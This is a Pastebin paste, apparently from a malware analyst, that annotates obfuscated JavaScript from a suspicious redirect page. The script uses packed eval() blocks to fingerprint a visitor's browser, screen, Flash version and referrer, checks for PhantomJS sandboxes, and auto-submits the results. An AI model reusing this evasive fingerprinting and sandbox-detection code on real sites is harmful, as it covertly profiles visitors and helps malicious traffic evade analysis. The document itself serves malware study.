API tools faq
paste
Advertisement
MalwareBreakdown

JavaScript

MalwareBreakdown
Feb 19th, 2017
10,462
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.40 KB | None | 0 0
raw download clone embed print report
  1. // this is an excerpt of the script tags in the original JS file
  2. // mainly to focus on the 'body' of the JS
  3.  
  4. mTop = top;
  5. mSelf = self;
  6. submited = false;
  7.  
  8. function submit() {
  9.  
  10. if (submited) {
  11. return false;
  12. }
  13.  
  14. submited = true;
  15.  
  16. // perform javascript eval()
  17. eval( // broken down for ease of viewing
  18. // this function accepts six input values, and the results of those values appear to be dependent upon one another
  19. function(p,a,c,k,e,d){
  20.  
  21. e=function(c){
  22. return c.toString(36)
  23. };
  24.  
  25. if(!''.replace(/^/,String)){
  26. while(c--){
  27. d[c.toString(a)]=k[c]||c.toString(a)
  28. }
  29.  
  30. k=[function(e){
  31. return d[e]
  32. }];
  33.  
  34. e=function(){
  35. return'\\w+'
  36. };
  37.  
  38. c=1
  39. };
  40.  
  41. while(c--){
  42. if(k[c]){
  43. p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
  44. }
  45. }
  46. return p
  47. } // end of function 'packed'
  48. // below are in the input parameters for the function
  49. // each occupying a single line to show what input belongs to which parameter
  50. ('c a;c b;c 6;l(9 4.k!=\'8\'){a=4.k;b=4.m}i l(9 3.5!=\'8\'&&9 3.5.7!=\'8\'&&3.5.7!=0){a=3.5.7;b=3.5.g}i{a=3.j(\'h\')[0].7;b=3.j(\'h\')[0].g}o{6=4.n!==4.q?1:0}p(e){6=2}3.d(\'a\').f=a;3.d(\'b\').f=b;3.d(\'6\').f=6;',
  51. 27,
  52. 27,
  53. '|||document|window|documentElement|ix|clientWidth|undefined|typeof|||var|getElementById||value|clientHeight|body|else|getElementsByTagName|innerWidth|if|innerHeight|self|try|catch|top'.split('|'),
  54. 0,
  55. {}) // this is the end of the input parameters
  56. ); // end the eval() statement
  57.  
  58.  
  59.  
  60. var flash = 0;
  61. try {
  62. var FlashDetect=new function(){
  63. var self=this;
  64. self.installed=false;
  65. self.raw="";
  66. self.major=-1;
  67. self.minor=-1;
  68. self.revision=-1;
  69. self.revisionStr="";
  70. var activeXDetectRules=[
  71. // activeXDetection rules
  72. // looks like an structure of arrays that hold dictionary key-value pairs for "name" and "version"
  73. {"name":"ShockwaveFlash.ShockwaveFlash.7","version":function(obj){return getActiveXVersion(obj);}},
  74. {"name":"ShockwaveFlash.ShockwaveFlash.6","version":function(obj){var version="6,0,21";try{obj.AllowScriptAccess="always";version=getActiveXVersion(obj);}catch(err){}
  75. return version;}},
  76. {"name":"ShockwaveFlash.ShockwaveFlash","version":function(obj){return getActiveXVersion(obj);}}
  77. ];
  78.  
  79. // this method will take input of the activeXObj and the return value would be the version of activeX in use
  80. var getActiveXVersion=function(activeXObj){
  81. var version=-1;
  82. try{
  83. version=activeXObj.GetVariable("$version");
  84. }catch(err){}
  85. return version;
  86. }; // end getActiveXVersion function
  87.  
  88. // this method would be used to obtain the activeXObj given the input name
  89. var getActiveXObject=function(name){
  90. var obj=-1;
  91. try{
  92. obj=new ActiveXObject(name);
  93. }catch(err){
  94. obj={activeXError:true};
  95. }
  96. return obj;
  97. }; // end getActiveXObject function
  98.  
  99. // this is a method to parse out the ActiveXVersion that is in use, given a string input
  100. // return an array of dictionary key-value pairs major version, minor version, revision number, and revision string
  101. var parseActiveXVersion=function(str){
  102. var versionArray=str.split(",");
  103. return{"raw":str,"major":parseInt(versionArray[0].split(" ")[1],10),"minor":parseInt(versionArray[1],10),"revision":parseInt(versionArray[2],10),"revisionStr":versionArray[2]}; // end return
  104. }; // end parseActiveXVersion function
  105.  
  106. // this method is used to parse the standard version, given a string input
  107. // the return value is an array of dictionary key-value pairs major, minor, revision string, and revision number
  108. var parseStandardVersion=function(str){
  109. var descParts=str.split(/ +/);
  110. var majorMinor=descParts[2].split(/\./);
  111. var revisionStr=descParts[3];
  112. return{"raw":str,"major":parseInt(majorMinor[0],10),"minor":parseInt(majorMinor[1],10),"revisionStr":revisionStr,"revision":parseRevisionStrToInt(revisionStr)}; // end return
  113. }; // end parseStandardVersion function
  114.  
  115. // this method is to parse the revision string, given a string input
  116. // the return value is either parsed out or the current class revision value
  117. var parseRevisionStrToInt=function(str){
  118. return parseInt(str.replace(/[a-zA-Z]/g,""),10)||self.revision;
  119. }; // end parseRevisionsStrToInt function
  120.  
  121. // accepts the version as input
  122. // returns true if the class' major version is greater than or equal to the input version, otherwise false
  123. self.majorAtLeast=function(version){
  124. return self.major>=version;
  125. }; // end majorAtLeast function
  126.  
  127. // accepts the version as input
  128. // returns true if the class' minor version is greater than or equal to the input version, otherwise false
  129. self.minorAtLeast=function(version){
  130. return self.minor>=version;
  131. }; // end minorAtLeast function
  132.  
  133. // accepts the version as input
  134. // returns true if the class' revision number is greater than or equal to the input version, otherwise false
  135. self.revisionAtLeast=function(version){
  136. return self.revision>=version;
  137. }; // end revisionAtLeast function
  138.  
  139. // accepts the major version as input
  140. self.versionAtLeast=function(major){
  141. // creates a list of the major version, minor version, and version number
  142. var properties=[self.major,self.minor,self.revision];
  143.  
  144. // compares the length of the lists 'properties' and 'arguments' for which is shorter
  145. var len=Math.min(properties.length,arguments.length);
  146.  
  147. // iterate through the the lists (stopping condition is the shorter list's length)
  148. for(i=0;i<len;i++){
  149. // tests if the value at each index of the list 'properties' si greater than or equal to the value at each index of 'arguments'
  150. if(properties[i]>=arguments[i]){
  151. // if the versions match and we haven't run off the array, current for-loop iteration ends and proceed with the next
  152. if(i+1<len&&properties[i]==arguments[i]){
  153. continue;
  154. // this indicates the indexed value at 'properties' is greater than 'arguments' breakout and return true
  155. } else {
  156. return true;
  157. } // end inner if-else statement
  158. // otherwise the indexed value at 'properties' is greater than 'arguments' breakout and return false
  159. } else {
  160. return false;
  161. } // end outer if-else statement
  162. } // end for-loop
  163. }; // end versionAtLeast function
  164.  
  165.  
  166. self.FlashDetect=function(){
  167. if(navigator.plugins&&navigator.plugins.length>0){
  168. var type='application/x-shockwave-flash';
  169. var mimeTypes=navigator.mimeTypes;
  170. if(mimeTypes&&mimeTypes[type]&&mimeTypes[type].enabledPlugin&&mimeTypes[type].enabledPlugin.description){
  171. var version=mimeTypes[type].enabledPlugin.description;
  172. var versionObj=parseStandardVersion(version);
  173. self.raw=versionObj.raw;
  174. self.major=versionObj.major;
  175. self.minor=versionObj.minor;
  176. self.revisionStr=versionObj.revisionStr;
  177. self.revision=versionObj.revision;
  178. self.installed=true;
  179. }
  180. } else if(navigator.appVersion.indexOf("Mac")==-1&&window.execScript){
  181. var version=-1;
  182. for(var i=0;i<activeXDetectRules.length&&version==-1;i++){
  183. var obj=getActiveXObject(activeXDetectRules[i].name);
  184. if(!obj.activeXError){
  185. self.installed=true;
  186. version=activeXDetectRules[i].version(obj);
  187. if(version!=-1){
  188. var versionObj=parseActiveXVersion(version);
  189. self.raw=versionObj.raw;
  190. self.major=versionObj.major;
  191. self.minor=versionObj.minor;
  192. self.revision=versionObj.revision;
  193. self.revisionStr=versionObj.revisionStr;
  194. } // of if statement for 'version != -1'
  195. } // end of if statement for 'not activeXError'
  196. } // end of for-loop
  197. } // end of outermost if-elseif statement
  198. }(); // end FlashDetect constructor, no input parameters are passed
  199. }; // end the FlashDetect class
  200.  
  201. if (FlashDetect.major > 0) {
  202. flash = 1;
  203. }
  204. } catch (e) {
  205. flash = 2;
  206. } // end major try-catch block
  207.  
  208. window.document.getElementById("fs").value=flash;
  209.  
  210. // perform javascript eval()
  211. eval( // broken down for ease of viewing
  212. function(p,a,c,k,e,d){
  213. e=function(c){
  214. return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
  215. };
  216. if(!''.replace(/^/,String)){
  217. while(c--){
  218. d[e(c)]=k[c]||e(c)
  219. }
  220.  
  221. k=[function(e){
  222. return d[e]
  223. }];
  224.  
  225. e=function(){
  226. return'\\w+'
  227. };
  228.  
  229. c=1
  230. };
  231.  
  232. while(c--){
  233. if(k[c]){
  234. p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
  235. }
  236. }
  237.  
  238. return p
  239. } // end of function 'packed'
  240. // below are in the input parameters for the function
  241. // each occupying a single line to show what input belongs to which parameter
  242. ('b 4={};8{4.17=n.1b.1p;4.R=n.1b.1p}5(e){4.17=-1;4.R=-1}8{4.S=n.1u;4.X=n.1r}5(e){4.S=-1;4.X=-1}8{4.V=n.1O;4.T=n.1N}5(e){4.V=-1;4.T=-1}8{4.Q=n.1M;4.14=n.1K}5(e){4.Q=-1;4.14=-1}8{4.Y=n.1B.1C.z}5(e){4.Y=-1}8{4.15=f.1D.1A}5(e){4.15=\'-\'}8{4.1j=f.1z}5(e){4.1j=\'-\'}8{4.19=(!(v.G 1w 1x)||v.G.z==0)?0:1}5(e){4.19=-1}8{4.18=n.1y||n.1E}5(e){4.18=\'-\'}8{4.11=1k(v.1F)==="h"?1:0}5(e){4.11=-1}8{4.P=1k(v.1v)!=="1J"?1:0}5(e){4.P=-1}4.H=0;8{b 13=1f h(){b 9=1G;9.N=1c;9.w="";9.p=-1;9.s=-1;9.q=-1;9.r="";b L=[{"C":"A.A.7","c":h(l){m K(l)}},{"C":"A.A.6","c":h(l){b c="6,0,21";8{l.1H="1I";c=K(l)}5(O){}m c}},{"C":"A.A","c":h(l){m K(l)}}];b K=h(1e){b c=-1;8{c=1e.1t("$c")}5(O){}m c};b 1i=h(C){b l=-1;8{l=1f 1q(C)}5(O){l={1n:F}}m l};b 1l=h(t){b D=t.I(",");m{"w":t,"p":B(D[0].I(" ")[1],10),"s":B(D[1],10),"q":B(D[2],10),"r":D[2]}};b 1g=h(t){b 1a=t.I(/ +/);b 16=1a[2].I(/\\./);b r=1a[3];m{"w":t,"p":B(16[0],10),"s":B(16[1],10),"r":r,"q":1o(r)}};b 1o=h(t){m B(t.1s(/[a-1L-Z]/g,""),10)||9.q};9.2f=h(c){m 9.p>=c};9.2g=h(c){m 9.s>=c};9.2e=h(c){m 9.q>=c};9.2d=h(p){b J=[9.p,9.s,9.q];b 12=2a.2b(J.z,M.z);1m(i=0;i<12;i++){u(J[i]>=M[i]){u(i+1<12&&J[i]==M[i]){2i}W{m F}}W{m 1c}}};9.13=h(){u(v.G&&v.G.z>0){b E=\'1P/x-2c-2h\';b y=v.y;u(y&&y[E]&&y[E].U&&y[E].U.1d){b c=y[E].U.1d;b o=1g(c);9.w=o.w;9.p=o.p;9.s=o.s;9.r=o.r;9.q=o.q;9.N=F}}W u(v.2k.2j("29")==-1&&n.1V){b c=-1;1m(b i=0;i<L.z&&c==-1;i++){b l=1i(L[i].C);u(!l.1n){9.N=F;c=L[i].c(l);u(c!=-1){b o=1l(c);9.w=o.w;9.p=o.p;9.s=o.s;9.q=o.q;9.r=o.r}}}}}()};u(13.p>0){4.H=1}}5(e){4.H=2}8{1h(4)}5(e){};h 1h(d){8{f.k(\'1Y\').j=d.17}5(e){}8{f.k(\'1Z\').j=d.R}5(e){}8{f.k(\'26\').j=d.S}5(e){}8{f.k(\'27\').j=d.X}5(e){}8{f.k(\'25\').j=d.V}5(e){}8{f.k(\'24\').j=d.T}5(e){}8{f.k(\'20\').j=d.Q}5(e){}8{f.k(\'22\').j=d.14}5(e){}8{f.k(\'23\').j=d.Y}5(e){}8{f.k(\'1S\').j=d.15}5(e){}8{f.k(\'1R\').j=d.19}5(e){}8{f.k(\'1Q\').j=d.18}5(e){}8{f.k(\'1T\').j=d.11}5(e){}8{f.k(\'1U\').j=d.P}5(e){}8{f.k(\'1X\').j=d.1W}5(e){}8{f.k(\'28\').j=d.H}5(e){}};',
  243. 62,
  244. 145,
  245. '||||QC|catch|||try|self||var|version|||document||function||value|getElementById|obj|return|window|versionObj|major|revision|revisionStr|minor|str|if|navigator|raw||mimeTypes|length|ShockwaveFlash|parseInt|name|versionArray|type|true|plugins|CF|split|properties|getActiveXVersion|activeXDetectRules|arguments|installed|err|NG|WIW|SH|WX|WH|enabledPlugin|WW|else|WY|WFC|||NB|len|FlashDetect|WIH|PL|majorMinor|SW|PT|NP|descParts|screen|false|description|activeXObj|new|parseStandardVersion|QCDone|getActiveXObject|RF|typeof|parseActiveXVersion|for|activeXError|parseRevisionStrToInt|width|ActiveXObject|screenY|replace|GetVariable|screenX|geolocation|instanceof|PluginArray|callPhantom|referrer|href|top|frames|location|_phantom|sendBeacon|this|AllowScriptAccess|always|undefined|innerHeight|zA|innerWidth|outerHeight|outerWidth|application|ci_PT|ci_NP|ci_PL|ci_NB|ci_NG|execScript|DM|ci_DM|ci_SW|ci_SH|ci_WIW||ci_WIH|ci_WFC|ci_WH|ci_WW|ci_WX|ci_WY|ci_CF|Mac|Math|min|shockwave|versionAtLeast|revisionAtLeast|majorAtLeast|minorAtLeast|flash|continue|indexOf|appVersion'.split('|'),
  246. 0,
  247. {}) // end of FlashFunction input parameters
  248. ) // end of second eval() function
  249.  
  250.  
  251.  
  252.  
  253.  
  254. // submit the form element data
  255. window.document.getElementById("submit-form").submit();
  256. } // end function submit()
  257.  
  258. // function that sets the timeout value to true and sends the form data
  259. function submitByTimeout(){
  260. window.document.getElementById("timeout").value=1;
  261. submit();
  262. }
  263.  
  264. // call the submit() function
  265. submit();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!